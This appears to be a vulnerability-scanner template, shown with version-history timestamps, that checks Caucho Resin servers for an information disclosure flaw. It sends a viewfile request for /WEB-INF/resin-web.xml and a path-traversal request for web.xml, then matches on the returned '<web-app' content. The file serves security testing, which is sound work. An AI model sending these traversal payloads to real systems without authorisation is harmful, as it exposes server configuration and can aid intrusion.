2021-02-01 17:32:39 +00:00
|
|
|
id: caucho-resin-info-disclosure
|
2021-02-01 15:43:29 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Caucho Resin Information Disclosure
|
|
|
|
author: pikpikcu
|
|
|
|
severity: info
|
2021-02-01 17:33:11 +00:00
|
|
|
reference: https://www.exploit-db.com/exploits/27888
|
2021-09-09 13:38:13 +00:00
|
|
|
tags: exposure,resin
|
2021-02-01 15:43:29 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-08-19 17:41:29 +00:00
|
|
|
- "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" # Version: 3.0.17/3.0.18
|
|
|
|
- "{{BaseURL}}/%20../web-inf/web.xml" # Version: 3.1.1
|
2021-02-01 15:43:29 +00:00
|
|
|
|
2021-08-19 17:41:29 +00:00
|
|
|
matchers-condition: and
|
2021-02-01 15:43:29 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-08-19 17:39:26 +00:00
|
|
|
- "<web-app"
|
|
|
|
- "</web-app>"
|
|
|
|
part: body
|
2021-08-19 17:41:29 +00:00
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|